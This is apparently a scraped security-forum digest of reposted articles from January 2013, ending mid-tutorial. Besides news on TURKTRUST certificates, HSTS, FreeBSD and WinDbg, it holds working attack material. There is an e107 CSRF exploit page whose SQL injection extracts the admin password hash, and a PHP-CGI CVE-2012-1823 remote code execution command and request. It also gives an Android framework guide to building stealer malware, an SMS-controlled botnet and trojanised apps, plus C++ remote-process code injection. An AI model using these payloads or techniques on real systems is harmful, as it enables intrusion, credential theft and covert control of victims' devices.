[h=2]Hacker Database[/h]Browse the World's Largest Public Hacker Database Link: http://www.soldierx.com/hdb Haters gonna hate : TinKode, sysgh0st | SOLDIERX.COM

[h=1]TURKTRUST CA Problems[/h] Kurt Baumgartner Kaspersky Lab Expert Posted January 03, 21:04 GMT Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other google properties. A Chrome installation detected a "an unauthorized digital certificate for the "*.google.com" domain" late the night of Dec. 24th 2012, and the Google security team's investigation began there. TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused and fraudulently issue a certificate for *.google.com. Microsoft is not only issuing fixes for this CA trust problem, but including known CA fixes in the recent past. This list of Google properties are fixed by the release: *.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.yo utube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com The release may cause some confusion. The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are effected, as is the fraudulent Google property certificate. Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on both Windows Vista and Windows 7, on Windows XP and its manual update root package, and on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 OS systems. To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly effect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2. Both Mozilla and Google posted information about the problem. Google pushed Chrome’s certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group. It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the “TÜRKTRUST Bilgi Ýletiþim ve Biliþim Güvenliði Hizmetleri A.Þ. © Aralýk 2007” root certificate, pending further review". Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues. Sursa: TURKTRUST CA Problems - Securelist

Analytical Summary Of The Blackhole Exploit Kit Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly. A. What a browser exploit kit is, and what it isn't It only does exploits Directing victims to the exploits is out of scope Usually done with spam or iframe injections The actual malware installed is out of scope too Where is exploit kit is hosted, is also quite variable B. Timeline Version 1.0.0 - September 2010 i. It's not that different from other exploit kits Version 1.0.1 Version 1.0.2 - November 2010 i. Changelog ii. Leaked in May 2011 Version 1.1.0 - December 2010 i. Changelog Version 1.2.0 - August 2011 i. Changelog Version 1.2.1 - December 2011 Version 1.2.2 i. Cryptome "Virus" Version 1.2.3 - March 2012 Version 1.2.4 - June 2012 i. CVE-2012-1723 ii. CVE-2011-2110 Version 1.2.5 - July 2012 i. CVE-2012-1889 ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm' August 2012 i. CVE-2012-4681 Version 2.0.0 - September 2012 i. Changelog ii. The official announcement isn't entirely true. C. The "Free Version" Pulled from a system with C99 Shell IonCube "copy protection" How to break IonCube obfuscation Analysis of PHP Source Code D. Open Source Code in use PluginDetect MaxMind GeoIP etc. E. The Exploits CVE-2010-0188 etc. etc. etc. as time allows X. There is almost no change in the expliots themselves from one version of the exploit kit to the next. Y. Currious clues about the possible authorship of some exploits Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Analytical Summary Of The Blackhole Exploit Kit

Beef - Java Payload Exploitation Description: In this video I will show you how to exploit a system using BeEF Browser Exploitation Framework and Java Payload Module. In BeEF Framework there is one module available called Java Payload in local exploits we are going to use that module and exploiting the windows -7 system. So, first you need to hook the browser and use that module victim will get the Java Pop-up if he click on OK you will get the meterpreter shell in some time Note for getting session it will take some time so be patient. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef - Java Payload Exploitation

[h=1]Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video[/h]January 3rd, 2013, 15:33 GMT · By Eduard Kovacs Security researcher Luca De Fulgentis has identified a number of user interface redressing (clickjacking) vulnerabilities in popular services that could be leveraged by cybercriminals to gather user information in what’s known as identification attacks. He has also identified a clickjacking flaw in Google Chrome. The fact that many websites don’t use the X-Frame-Options header or other anti-clickjacking mechanisms allows an attacker to harvest all sorts of information if he can trick the victim into clicking on apparently innocent links or buttons. The expert has demonstrated that such an issue in support.google.com can be used to extract a user’s email address, full name and profile picture URL. The names, email addresses and other details of Microsoft Live and Yahoo! users could also be easily obtained by leveraging clickjacking vulnerabilities. However, the most interesting finding of De Fulgentis is a Chrome vulnerability that allows attackers to extract user information despite the many security mechanisms implemented by Google, such as denying the use of the view-source handler and disallowing cross-origin drag and drop. “Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the ‘dropper’ is a form (text area, input text field, etc.) located on the same domain,” the researcher explained. “Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntary publish sensitive data.” To demonstrate how such attacks work, the expert has published a couple of proof-of-concept videos showing how the vulnerability could be leveraged against Google and Amazon users. Earlier in December, De Fulgentis published the details of a similar vulnerability that affected Firefox. Here are the proof-of-concept videos published by the expert: Sursa: Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video - Softpedia

Stiam ca e un macro, dar nu stiam cum e definit si dupa mici cautari: WinBase.h #define ZeroMemory RtlZeroMemory RtlZeroMemory e definit in WDH.h: #define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length)) Aparent e acelasi lucru. E probabil insa sa fie mici diferente la apel, "memset" probabil va apela wrapper-ul din runtime-ul de la Visual C iar apelul ZeroMemory e posibil sa fie executat direct in kernel (RtlZeroMemory routine (Windows Drivers)). O sa fac putin research sa vad.

[h=1]Defrag Tools: #21 - WinDbg - Memory User Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder 33 minutes, 48 seconds [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 31.0 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 185.9 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 109.7 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 408.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 285.1 MB High Quality WMV (PC, Xbox, MCE) [h=3]File size[/h] 507.7 MB format < > embed + queue In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a user mode debug session. We cover these commands: !address -summary !address <addr> !vprot <addr> !mapped_file <addr> Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Microsoft Windows SDK for Windows 7 and .NET Framework 4 Sysinternals VMMap Performance and Memory Consumption Under WOW64 MEMORY_BASIC_INFORMATION structure Memory Protection Constants Timeline: [00:50] - Live Debug of Notepad [01:10] - VMMap of Notepad [02:08] - Virtual Address Space summary (!address -summary) [04:30] - 'Large Address Space Aware' increases the VA space from 2GB to 4GB [08:11] - Memory Mapped Files [10:11] - Memory Type, State and Protection (inc. Guard Pages) [21:22] - Allocation Base vs. Base Address (!address <addr>) [26:52] - Virtual Protection shows the Alloc. Base Protection (!vprot <addr>) [29:14] - Mapped Files (!mapped_file <addr>) Sursa: Defrag Tools: #21 - WinDbg - Memory User Mode | Defrag Tools | Channel 9

NFC - NEAR FIELD COMMUNICATION Subho Halder and Aditya Gupta ........................................................ INTRODUCTION Near Field Communication at glance. What is NFC ? NFC or Near Field Communication is a set of standards or protocols to communicate between two devices by either touching or bringing into close proximity ( less than 4 cm ). The communicating protocols of such devices are based on RFID Standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded on 2004 by some major companies such as Sony, Nokia, Philips, Samsung etc. The operating Frequency of such communication is merely 13.56 MHz ( +/- 7 ) which is very low. This gives an advantage of easily integrating into portable devices without the need of much battery power. Download: www.exploit-db.com/download_pdf/23826

[h=1]MyBB (editpost.php, posthash) SQL Injection Vulnerability[/h] MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection. Vulnerable code: /editpost.php === Line 398 === $posthash_query = "posthash='{$posthash}' OR "; === It can be done by using Tamper Data(Or Live HTTP Headers), and when submitting a post, edit the 'posthash' POST parameter to your payload, submitting, then going to edit your post. Small "HOWTO" in picture: http://imgur.com/a/JxfEI This bug was not found by me, but afaik, I am the first one to release it. -- *Joshua Rogers* - Retro Game Collector && IT Security Specialist gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg> Sursa: MyBB (editpost.php, posthash) SQL Injection Vulnerability

[h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h] # Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection # Google Dork: intext:"This site is powered by e107" # Date: 01/01/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://e107.org # Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download # Version: 1.0.2 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2012-6434 ----------------------------------------------------------------------------------------- Description: Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure. The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class. The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download. ------------------------------------------------------------------------------------------ Exploit: <html> <body onload="document.formCSRF.submit();"> <form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create"> <input type="hidden" name="cat_id" value="1"/> <input type="hidden" name="download_category" value="2"/> <input type="hidden" name="download_name" value="adminpassdownload"/> <input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/> <input type="hidden" name="download_url_external" value=""/> <input type="hidden" name="download_filesize_external" value=""/> <input type="hidden" name="download_filesize_unit" value="KB"/> <input type="hidden" name="download_author" value=""/> <input type="hidden" name="download_author_email" value=""/> <input type="hidden" name="download_author_website" value=""/> <input type="hidden" name="download_description" value=""/> <input type="hidden" name="download_image" value=""/> <input type="hidden" name="download_thumb" value=""/> <input type="hidden" name="download_datestamp" value=""/> <input type="hidden" name="download_active" value="1"/> <input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/> <input type="hidden" name="download_comment" value="1"/> <input type="hidden" name="download_visible" value="0"/> <input type="hidden" name="download_class" value="0"/> <input type="hidden" name="submit_download" value="Submit+Download"/> </form> </body> </html> ------------------------------------------------------------------------------------------ Fix: This bug has been fixed in the following revision: r13058 ------------------------------------------------------------------------------------------ Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family. Contact: Mail: infosec4breakfast@gmail.com Blog: infosec4breakfast.com Twitter: @jershmagersh Youtube: youtube.com/user/infosec4breakfast Sursa: e107 v1.0.2 CSRF Resulting in SQL Injection

WiFi Password Decryptor [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]WiFi Password Decryptor is the FREE software to instantly recover Wireless account passwords stored on your system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information [/TD] [/TR] [TR] [TD] WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in clear text [/TD] [/TR] [TR] [TD=align: justify]After the successful recovery you can save the password list to HTML/XML/TEXT file. You can also right click on any of the displayed account and quickly copy the password. Under the hood, 'WiFi Password Decryptor' uses System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it more safer and reliable. Also it makes us to have just single EXE to work on both 32-bit & 64-bit platforms. New version 1.5 supports command-line version making it useful for automation & penetration testers. It has been successfully tested on Windows Vista and higher operating systems including Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Features & Benefits [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Instantly decrypt and recover stored WiFi account passwords Recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) Command-line version for automation & penetration testers. Simple & elegant GUI interface makes it easy to use. Right click context menu to quickly copy the Password Sort feature to arrange the displayed passwords Save the recovered WiFi password list to HTML/XML/TEXT file. Integrated Installer for assisting you in local Installation & Uninstallation. [/TD] [/TR] [/TABLE] Details: http://securityxploded.com/wifi-password-decryptor.php Download: http://securityxploded.com/download.php#wifipassworddecryptor

[h=1]Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823[/h]by infodox The CVE-2012-1823 PHP-CGI exploit was, quite possibly, one of the most groundbreaking exploits of 2012. In a year that brought us MS-12-020 (the most hyped bug in my recollection), multiple Java 0day exploits, and several MySQL exploits, the PHP-CGI bug still stands out as one of the most hilariously brilliant bugs to show up for several reasons. Primarily the massive misunderstanding of how it worked. For this exploit to work, PHP had to be running in CGI mode. A fairly obscure configuration not seen all too often in the wild. Essentially, with this vulnerability, you could inject arguements into the PHP-CGI binary and make changes to php.ini directives, allowing for remote code execution. Developing an exploit for this bug is trivial. In order to gain remote code execution, you tell PHP.ini that it is to allow URL inclusion ( allow_url_include = 1 ), and to automatically prepend the “file” php://input. This means whatever we send in the POST request is parsed as PHP, and executed. One way to exploit this (targetting example.com), using the lwp-request’s “POST” utility, is as follows. echo “<?php system(‘id’);die(); ?>” | POST “http://example.com/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input” As you will see in the video, we can easily use this to execute commands remotely from a BASH shell. The HTTP request sent, looks something similar to this: POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: example.com User-Agent: lwp-request/6.03 libwww-perl/6.04 Content-Length: 29 Content-Type: application/x-www-form-urlencoded <?php system(‘id’);die(); ?> he response to that was the server sending back the result of our command (id), so we know it works. So now we have a somewhat reliable “commandline” RCE method, however, we like to automate things… Let’s see how hard it is to write a reliable exploit in Python. The following screenshot shows exploitation using Python. Exploiting PHP-CGI bug with Python So, we know now that using Python’s requests library (a mainstay of all my exploits, as I guess you noticed). Now that we have reliable exploitation using Python, I decided to go a step further and write an actual exploit in Python to automate the whole thing. It simply drops you into a shell of sorts, giving you the ability to run commands as the web-user. Exploit code available here: Google Code – Insecurety Research So, along comes the demo, as usual in video format. This time, with additional tunes by Blackmail House who gave me permission to use their music in demo videos the other day in the pub Remember, play nice out there. Sursa: Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823 | Insecurety Research

Hack Android With Android Exploitation Framework IMPORTANT NOTE: The below information is for educational and research purposes only and to illustrate how insecure the Android platform is. You would also come to see, how most of the present Android anti-malwares fail to detect threats in the current scenario. Also, infecting other persons computer/mobile devices with a malicious application without his permission is an punishable crime. Their exist a lot of tools to exploit the security holes in normal PC environment, but there have been really less tools for the Android environment, which at the same time is expandable. By expandable, i’m trying to say, that the users who use the framework, could build there own modules and share with the security community. Android Framework for Exploitation is an open-source project which we have developed in order to increase mobile security research, check for application based and platform based vulnerabilities, as well as write plugins for the framework and share it with the community. Subho Halder and me (Aditya Gupta) have developed a framework known as Android Framework for Exploitation, which we released in BlackHat Abu Dhabi in December 2012. The aim of this framework is to help the mobile security community to analyze applications, exploit vulnerabilities, build POCs, and share their own modules with other users. One of the interesting features of this framework is the ability to build malwares, botnets and even inject malwares in existing legitimate applications. This is just to show that how ineffective our current mobile anti malwares are against these type of infected version of legitimate applications, as at the time of writing, none of the anti malwares for Android detected the malware sample. Some of the features which we’ll be looking into this post is : 1. Creating a malware 2. Creating a botnet 3. Injecting malicious codes in a legitimate application 4. Analyzing vulnerable applications Before we go further, let us have a look at the file structure of AFE. Once you download AFE, you will be having a structure similar to the one given below. The Input will be containing all the input apk(s) for any processing, such as crypting the apk to make it undetectable from anti malwares, or inserting the apk in any other legitimate apk or so on. Creating a malware AFE gives the users to create malwares for their devices with prebuilt templates. You could also modify the source code of the malware, and modify the GUI of the application apk as you want. To create a malware, first of all you have to launch AFE by typing in ./afe. To get help at any point of time, just type in ? and hit enter. Note : This tool is made natively for *nix based systems. If you’re running Windows, you could use it by installing Cygwin. Also make sure you’ve all the dependencies such as Python and the android sdk installed. Once you are inside menu, type in run [the module name] to execute a particular module. In this case, the module is named malware. Once you type in run malware Just type in your local IP address in the Set Reverse IP option. Once you set your reverse IP (same as LHOST), you’ll have the option of Stealer. There are 3-predefined stealers, and you can add more yourself. The 3 already existing ones include – • Call Logs • Contacts • Messages Here’s a video of it. Creating a Botnet To create a botnet, you have to launch AFE as mentioned earlier. and go on to create a botnet, similar to as we did in the last demo. Once you’ve created and installed the botnet in any android based smartphone, you could control it by sending SMS from any phone to the infected phone, and getting the response back using SMS itself. Also, this whole process will go on in the background, so the user won’t be able to know if any kind of malicious activity is being performed. Some of the sms based commands are : toast: To display a particular message on the screen infect: To spread the botnet to any other device by sending a sms from already infected device browse : automatically open a URL on the victim’s phone shell : The most useful command. Could be used to execute any shell based commands. For example, xysec shell cat /proc/version Note: All the commands should be appended with the keyword ‘xysec’ - this could be changed by modifying the source of the botnet. This is to make sure the SMS which has been send as a command won’t be displayed in the notification of the victim. Analyzing Application for Leaking Content Providers One of the most important components of Android applications while working with application data is Content Providers. To get the content providers of the application, you could either reverse the application manually, or look for the content providers, or you could use tool such as Apktool, and parse information based on the filter of content:// To find content providers with the help of AFE, you need to place the application you want to analyse in the Input folder. Once we select the application, it will automatically present us with the list of content providers present in the application. After finding out the permission of the content providers, and if it is set as exported without any permission checking, the application is vulnerable to leaking content providers vulnerability. To make a POC of this vulnerability, we could use the content provider (vulnerable one) and make another application parsing this content provider. Following is a sample code snippet we made: We are accessing the Vulnerable application’s data using its content provider. Uri.parse("> We would in further update the Github repo located at https://github.com/xysec/AFE/ to make POCs automatically. Injecting malicious codes in legitimate application Using AFE, you could inject malicious codes in legitimate applications. This is to demonstrate how easy it is for malware authors to create infected version of the legitimate applications, and how anti-malwares should improve their detection strategy to distinguish between fake and legitimate applications. To create the application: Select the malware to be injected, Choose the target apk Type inject Once we select our target application, it will inject all the services and permissions from our malware (which we have already created) and even sign the newly create application with our key. The newly created file will be stored in /Output as the name of [originalapp].apk and [originalapp]_signed.apk. Creating Plugins for AFE AFE is an extendable framework, which could be integrated with user made plugins. To create a plugin, you need to go to the modules directory and create a directory with the name of your plugin name. Let us take an example of a plugin named as DB Stealer. This plugin, grabs all the database files (.db) from the device or emulator, and saves it on the system. The code for this plugin has been written in PHP. There are 3 necessary files : Run.sh dbstealer.php dbstealer.info Run.sh is the initializing code, which will load up the entire code (written in any language, in this case php), and will execute it. The second file, dbstealer.php is the main code of the plugin. It is loaded from run.sh with the code php dbstealer.php. The third file dbstealer.info will contain the information about the plugin, which will be displayed when the user will type in info dbstealer from the afe prompt. Hope you guys enjoyed the post. Feel free to mail us at security@xysec.com for any bug issues/suggestions/trainings/ideas! Sursa: Hack Android With Android Exploitation Framework | Learn How To Hack - Ethical Hacking and security tips

Pot sa va recomand ceva? Se numesc "car?i". Java de la 0 la expert (Necartonat) - Stefan Tanasa, Cristian Olaru, Stefan Andrei POL978-973-46-2405-8 - eMAG.ro Totul despre C si C++ manualul fundamental de programare in C si C++ - Kris Jamsa, Lars Klander TEO973-601-911-X - eMAG.ro C++ introducere in standard template library ALL973-571-798-8 - eMAG.ro Programare web in Bash si Perl - Sabin Buraga, Victor Tarhon-Onu, Stefan Tanasa POL973-683-931-1 - eMAG.ro Sql - Marin Fotache POL973-683-709-2 - eMAG.ro Tehnici De Web Design MCO973-000-000-19 - eMAG.ro Limbajul C# pentru incepatori - Notiuni de baza - Liviu Negrescu, Lavinia Negrescu ALB973-650-153-1 - eMAG.ro Secrete C++ - Constantin Galatan ALB973-650-186-8 - eMAG.ro Si sunt foarte multe, foarte detaliate, va garantez ca veti intelege. Este de preferat sa si aplicati pe masura ce cititi ceea ce gasiti prin ele.

[h=1]HTTP Strict Transport Security[/h] The lack of (or inconsistent use of) SSL puts users’ security and privacy at risk. Increasingly, popular sites require SSL not only for operations which are known to directly involve private data (login, etc) but for entire sessions. This is a good thing. Unfortunately, there are a number of techniques an attacker can use to work around this. The most well known of these is SSL-Stripping in which an active man-in-the-middle can intercept traffic between the browser and the server, downgrading what should be an HTTPS connection to an unencrypted HTTP connection. HSTS (HTTP Strict Transport Security) is designed to make attacks like this harder; it allows servers to specify that all subsequent connections must be made via HTTPS for a specified period of time. If a request is made over HTTP it will be automatically upgraded by the browser. Also, if the SSL certificate for an HSTS enabled site can’t be verified, the requested document won’t be loaded. There’s a gap in this protection though; if your initial connection to a site is intercepted, not only could your connection still be downgraded but the attacker could also stop the browser from seeing the HSTS header too. This can be resolved for popular sites that use HSTS by means of an in-browser preload list (coming soon in Firefox 17 – currently in Beta). You can read more about preloading HSTS in our earlier post on the subject. Firefox has supported HSTS since version 4; we think it’s about time your site did too. You can learn more about HSTS and how to implement it in this article on MDN. Sursa: HTTP Strict Transport Security | Mozilla Security Blog

FreeBSD 9.1-RELEASE Announcement The FreeBSD Release Engineering Team is pleased to announce the availability of FreeBSD 9.1-RELEASE. This is the second release from the stable/9 branch, which improves on the stability of FreeBSD 9.0 and introduces some new features. Some of the highlights: New Intel GPU driver with GEM/KMS support netmap(4) fast userspace packet I/O framework ZFS improvements from illumos project CAM Target Layer, a disk and processor device emulation subsystem Optional new C++11 stack including LLVM libc++ and libcxxrt Jail devfs, nullfs, zfs mounting and configuration file support POSIX2008 extended locale support, including compatibility with Darwin extensions oce(4) driver for Emulex OneConnect 10Gbit Ethernet card sfxge(4) driver for 10Gb Ethernet adapters based on Solarflare SFC9000 controller Xen Paravirtualized Backend Ethernet Driver (netback) improvement hpt27xx(4) driver for HighPoint RocketRAID 27xx-based SAS 6Gb/s HBA GEOM multipath class improvement GEOM raid class is enabled by default supporting software RAID by deprecated ataraid(8) kernel support for the AVX FPU extension Numerous improvements in IPv6 hardware offload support Please note that precompiled third-party packages are not available for 9.1-RELEASE at the time of release. See the Availability section below for further details. For a complete list of new features and known problems, please see the online release notes and errata list available at: FreeBSD 9.1-RELEASE Release Notes FreeBSD 9.1-RELEASE Errata For more information about FreeBSD release engineering activities please see: Release Engineering Information Sursa: FreeBSD 9.1-RELEASE Announcement

[h=1]Code Injections [beginner and advanced][/h]Author: [h=3]RosDevil[/h] This tutorial is for every level, from beginners to advanced (so to review some aspects or istructions) I will use as much as i can C++ in this tutorial. We're going through all kinds of injection. Before any type of injection we need to get the right privileges, SE_DEBUG_NAME, this is the function to get it: int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } after we need the PID of the target application, it can be got so: DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } now let's get started with injections: 1) Codecave Injection with CreateRemoteThread() This method has been treated a lot on internet so i won't go through the code step by step, if you want to see the documented functions go to msdn. steps: - Open the target Process through the PID (Api used: OpenProcess()) - Allocate space in the remote process for our function and parameters (Api used: VirtualAllocEx()) - Write our function and parameters in the remote process (Api used: WriteProcessMemory()) - Execute the remote code and optionally free the remote memory (Api used: CreateRemoteThread() and VirtualFree()) #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include "ntdef.h" #include <tlhelp32.h> typedef int (WINAPI* MsgBoxParam)(HWND, LPCSTR, LPCSTR, UINT); using namespace std; struct PARAMETERS{ DWORD MessageBoxInj; char text[50]; char caption[25]; int buttons; // HWND handle; }; DWORD getPid(string procName); int privileges(); DWORD myFunc(PARAMETERS * myparam); DWORD Useless(); int main() { privileges(); DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; //error HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * mytext = "Hello by CodeCave!"; char * mycaption = "Injection result"; PARAMETERS data; //let's fill in a PARAMETERS struct HMODULE user32 = LoadLibrary("User32.dll"); data.MessageBoxInj = (DWORD)GetProcAddress(user32, "MessageBoxA"); strcpy(data.text, mytext); strcpy(data.caption, mycaption); data.buttons = MB_OKCANCEL | MB_ICONQUESTION; DWORD size_myFunc = (PBYTE)Useless - (PBYTE)myFunc; //this gets myFunc's size //--------now we are ready to inject LPVOID MyFuncAddress = VirtualAllocEx(p, NULL, size_myFunc, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(p, MyFuncAddress, (void*)myFunc,size_myFunc, NULL); LPVOID DataAddress = VirtualAllocEx(p,NULL,sizeof(PARAMETERS),MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE); WriteProcessMemory(p, DataAddress, &data, sizeof(PARAMETERS), NULL); HANDLE thread = CreateRemoteThread(p, NULL, 0, (LPTHREAD_START_ROUTINE)MyFuncAddress, DataAddress, 0, NULL); if (thread!=0){ //injection completed, not we can wait it to end and free the memory WaitForSingleObject(thread, INFINITE); //this waits untill thread thread has finished VirtualFree(MyFuncAddress, 0, MEM_RELEASE); //free myFunc memory VirtualFree(DataAddress, 0, MEM_RELEASE); //free data memory CloseHandle(thread); CloseHandle(p); //don't wait for the thread to finish, just close the handle to the process cout<<"Injection completed!"<<endl; }else{ cout<<"Error!"<<endl; } system("PAUSE"); return EXIT_SUCCESS; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(pt.szExeFile == procName){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } DWORD myFunc(PARAMETERS * myparam){ MsgBoxParam MsgBox = (MsgBoxParam)myparam->MessageBoxInj; int result = MsgBox(0, myparam->text, myparam->caption, myparam->buttons); switch(result){ case IDOK: //your code break; case IDCANCEL: //your code break; } return 0; } DWORD Useless(){ return 0; } //this function is needed to get some extra privileges so your code will be able to work without 